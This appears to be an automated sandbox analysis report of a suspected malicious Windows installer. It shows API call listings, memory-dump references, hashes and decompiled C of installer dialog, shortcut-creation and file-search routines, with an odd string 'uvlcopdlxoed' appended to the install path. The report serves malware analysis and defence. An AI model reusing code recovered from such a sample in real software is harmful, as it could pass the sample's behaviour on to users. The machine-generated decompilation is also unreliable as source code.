0x00405691
0x00000000
0x00405691
0x00405674
0x004054af
0x004054b3
0x004054bb
0x004054bf
0x004054c2
0x004054c5
0x004054c8
0x004054cb
0x004054cc
0x004054cd
0x004054e6
0x004054e9
0x004054f3
0x00405502
0x0040550a
0x00405512
0x00405517
0x0040551a
0x00405526
0x0040552f
0x00405538
0x0040555a
0x00405560
0x00405571
0x00405576
0x00405584
0x00405592
0x00405592
0x00405597
0x004055a5
0x004055a5
0x004055aa
0x004055ad
0x004055b2
0x004055be
0x004055c7
0x004055d4
0x004055e3
0x004055d6
0x004055db
0x004055db
0x004055ef
0x004055ef
0x00405603
0x0040560c
0x00405615
0x00405625
0x00405631
0x00405631
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 004054EC
GetDlgItem.USER32(?,000003EE), ref: 004054FB
GetClientRect.USER32 ref: 00405538
GetSystemMetrics.USER32 ref: 0040553F
SendMessageA.USER32 ref: 00405560
SendMessageA.USER32 ref: 00405571
SendMessageA.USER32 ref: 00405584
SendMessageA.USER32 ref: 00405592
SendMessageA.USER32 ref: 004055A5
ShowWindow.USER32(00000000,?), ref: 004055C7
ShowWindow.USER32(?,00000008), ref: 004055DB
GetDlgItem.USER32(?,000003EC), ref: 004055FC
SendMessageA.USER32 ref: 0040560C
SendMessageA.USER32 ref: 00405625
SendMessageA.USER32 ref: 00405631
GetDlgItem.USER32(?,000003F8), ref: 0040550A

Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF

GetDlgItem.USER32(?,000003EC), ref: 0040564D
CreateThread.KERNEL32(00000000,00000000,Function_00005421,00000000), ref: 0040565B
CloseHandle.KERNEL32(00000000), ref: 00405662
ShowWindow.USER32(00000000), ref: 00405685
ShowWindow.USER32(?,00000008), ref: 0040568C
ShowWindow.USER32(00000008), ref: 004056D2
SendMessageA.USER32 ref: 00405706
CreatePopupMenu.USER32 ref: 00405717
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040572C
GetWindowRect.USER32 ref: 0040574C
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
SendMessageA.USER32 ref: 004057A1
OpenClipboard.USER32(00000000), ref: 004057B1
EmptyClipboard.USER32 ref: 004057B7
GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
GlobalLock.KERNEL32 ref: 004057CA
SendMessageA.USER32 ref: 004057DE
GlobalUnlock.KERNEL32(00000000), ref: 004057F7
SetClipboardData.USER32 ref: 00405802
CloseClipboard.USER32 ref: 00405808

Strings

PB, xrefs: 0040577D

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: PB
API String ID: 590372296-3196168531
Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x5f57f6
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040473e
0x00404744
0x0040474a
0x00404757
0x00404765
0x00404768
0x00404770
0x00404776
0x00404776
0x00404782
0x00404785
0x004047f3
0x004047fa
0x004048d1
0x004048d8
0x004048e7
0x004048e7
0x004048eb
0x004048f5
0x00404902
0x00404904
0x00404904
0x00404912
0x00404919
0x00404920
0x00404923
0x0040495a
0x0040495c
0x00404962
0x00404967
0x0040496b
0x0040496d
0x0040496d
0x00404989
0x00000000
0x0040498b
0x0040498e
0x0040499c
0x004049a2
0x004049a3
0x004049a6
0x004049a9
0x00000000
0x004049a9
0x00404925
0x00404927
0x0040492b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040492d
0x0040492d
0x0040493a
0x0040493f
0x00000000
0x00000000
0x00404943
0x00404945
0x00404945
0x0040494d
0x0040494f
0x00404952
0x00404955
0x00404958
0x00000000
0x00000000
0x00000000
0x00000000
0x00404958
0x004049b5
0x004049bf
0x004049c2
0x004049c5
0x004049cc
0x004049cc
0x004049ce
0x004049ce
0x004049d3
0x004049d5
0x004049dd
0x004049e4
0x004049e6
0x004049f1
0x004049f1
0x004049e6
0x004049f8
0x00404a01
0x00404a0b
0x00404a13
0x00404a2e
0x00404a15
0x00404a1e
0x00404a1e
0x00404a13
0x00404a33
0x00404a38
0x00404a3d
0x00404a46
0x00404a46
0x00404a4f
0x00404a51
0x00404a51
0x00404a5d
0x00404a65
0x00404a6f
0x00404a6f
0x00404a74
0x00000000
0x00404a74
0x00404923
0x004048da
0x004048e1
0x00000000
0x00000000
0x00000000
0x004048e1
0x00404800
0x00404809
0x00404823
0x00404828
0x00404832
0x00404839
0x00404845
0x00404848
0x0040484b
0x00404852
0x0040485a
0x0040485d
0x00404861
0x00404868
0x00404870
0x004048ca
0x00404872
0x00404873
0x0040487a
0x00404884
0x0040488c
0x00404899
0x004048ad
0x004048b1
0x004048b1
0x004048ad
0x004048b6
0x004048c3
0x004048c3
0x00404870
0x00000000
0x00404828
0x00404816
0x00000000
0x00000000
0x0040481c
0x00000000
0x00404787
0x00404794
0x0040479d
0x004047aa
0x004047aa
0x004047b1
0x004047b7
0x004047c0
0x004047c3
0x004047c6
0x004047ce
0x004047d1
0x004047d4
0x004047da
0x004047e1
0x004047e8
0x00404a7a
0x00404a8c
0x004047ee
0x004047f1
0x00000000
0x004047f1
0x004047e8

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040478D
SetWindowTextA.USER32(00000000,?), ref: 004047B7
SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
CoTaskMemFree.OLE32(00000000), ref: 00404873
lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048C3

Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B

Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040655B
Part of subcall function 00406503: CharNextA.USER32(?), ref: 00406568
Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040656D
Part of subcall function 00406503: CharPrevA.USER32(?,?), ref: 0040657D

GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
MulDiv.KERNEL32 ref: 0040499C

Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
Part of subcall function 00404AF5: SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE

Strings

A, xrefs: 00404861
PB, xrefs: 0040483B
uvlcopdlxoed, xrefs: 0040489F, 004048A4, 004048AF
C:\Users\user\AppData\Local\Temp, xrefs: 0040488E

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
API String ID: 2624150263-1753744704
Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408418,?,00000001,00408408,?), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-2935972921
Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A

Uniqueness

Uniqueness Score: -1.00%

Function 003D1AC3, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction ID: d241e4ad9633b26e50407d4c214ac206337efd47f83b2df48827af6663fe603d
Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction Fuzzy Hash: AA010C79A11248EFCB91DF99D58099DBBF4EB08320B118596E855E7711E330AE50DB40

Uniqueness

Uniqueness Score: -1.00%

Function 10001000, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x10001017

Memory Dump Source

Source File: 00000004.00000002.2163547953.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2163531689.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2163592483.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2163618148.0000000010004000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 003D18AB, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
